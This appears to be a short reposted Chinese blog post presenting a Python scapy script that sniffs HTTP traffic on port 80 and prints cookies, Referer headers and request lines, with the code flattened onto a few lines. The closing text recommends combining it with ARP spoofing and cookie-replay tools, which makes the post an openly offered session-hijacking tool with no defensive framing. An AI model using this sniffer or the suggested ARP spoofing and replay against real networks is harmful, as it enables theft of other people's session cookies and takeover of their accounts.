本文共 715 字,大约阅读时间需要 2 分钟。
代码如下:
from scapy.all import *def packet_callback(packet): if packet['TCP'].payload: cookie_pcaket=bytes(packet['TCP'].payload) if b"Cookie" in cookie_pcaket: #print(cookie_packet) for info in cookie_pcaket.split(b'\n'): if b'Referer' in info or b'GET /' in info: print(info) elif b'Cookie' in info: print(info,"\n")if __name__=="__main__": # filter参数用于执行过滤器 # iface用于设置嗅探器的网卡 # prn指定嗅探到的符合过滤条件的数据包时所调用的回调函数 # count用于指定嗅探到数据包的个数 # store指定不在内存当中保留原始数据包 sniff(filter="tcp port 80",iface="WLAN",prn=packet_callback,store=0)
启动改脚本后会抓取一些经过你网卡的一些cookie信息,结合arp欺骗使用效果更好,也可以结合一些cookie重放工具进行cookie重放。
转载地址:http://xyhzi.baihongyu.com/